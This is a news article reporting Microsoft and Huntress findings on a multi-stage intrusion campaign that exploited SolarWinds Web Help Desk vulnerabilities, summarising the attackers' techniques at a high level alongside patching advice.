SolarWinds Web Help Desk servers were the entry point for a sophisticated cyber intrusion campaign uncovered by security researchers. The multi stage activity, observed by Microsoft, began with attacks on internet exposed SolarWinds systems and later allowed attackers to move laterally across networks to access high value assets.
According to the Microsoft Defender Security Research Team, SolarWinds Web Help Desk instances were exploited to achieve unauthenticated remote code execution. Investigators said it remains unclear which vulnerability was used because affected SolarWinds servers were exposed to both older and newly disclosed flaws at the same time. These include CVE 2025 40551 with a CVSS score of 9.8, CVE 2025 40536 with a CVSS score of 8.1 and the previously patched CVE 2025 26399 with a CVSS score of 9.8. “Since the attacks occurred in December 2025 and on machines vulnerable to both the old and new set of CVEs at the same time, we cannot reliably confirm the exact CVE used to gain an initial foothold,” Microsoft said.
After compromising SolarWinds Web Help Desk, attackers executed arbitrary commands within the application. “Upon successful exploitation, the compromised service of a WHD instance spawned PowerShell to leverage BITS for payload download and execution,” researchers said. The attackers then deployed legitimate Zoho ManageEngine tools to maintain access, enumerated sensitive domain users including Domain Admins, established persistence using reverse SSH and RDP, attempted to run a QEMU virtual machine under the SYSTEM account, abused DLL side loading with wab.exe to steal credentials and in at least 1 case carried out a DCSync attack to extract data from Active Directory. The US Cybersecurity and Infrastructure Security Agency later added CVE 2025 40551 to its Known Exploited Vulnerabilities catalog and ordered federal agencies to apply patches by February 6, 2026.
SolarWinds Web Help Desk activity was also referenced in a February 8, 2026 update from cybersecurity firm Huntress, which detailed a similar incident from February 7, 2026. In that case, attackers deployed Zoho Assist, Velociraptor version 0.73.4 and Cloudflare tunnels for persistence and command and control, disabled Windows Defender and Firewall, collected system data and created scheduled tasks using QEMU. Huntress said the infrastructure matched earlier SolarWinds related intrusions. Microsoft warned, “This activity reflects a common but high impact pattern,” urging organizations to prioritize patching, remove unauthorized tools, rotate accounts and strengthen monitoring across systems.
Also read: Viksit Workforce for a Viksit Bharat
Do Follow: The Mainstream formerly known as CIO News LinkedIn Account | The Mainstream formerly known as CIO News Facebook | The Mainstream formerly known as CIO News Youtube | The Mainstream formerly known as CIO News Twitter
About us:
The Mainstream is a premier platform delivering the latest updates and informed perspectives across the technology business and cyber landscape. Built on research-driven, thought leadership and original intellectual property, The Mainstream also curates summits & conferences that convene decision makers to explore how technology reshapes industries and leadership. With a growing presence in India and globally across the Middle East, Africa, ASEAN, the USA, the UK and Australia, The Mainstream carries a vision to bring the latest happenings and insights to 8.2 billion people and to place technology at the centre of conversation for leaders navigating the future.
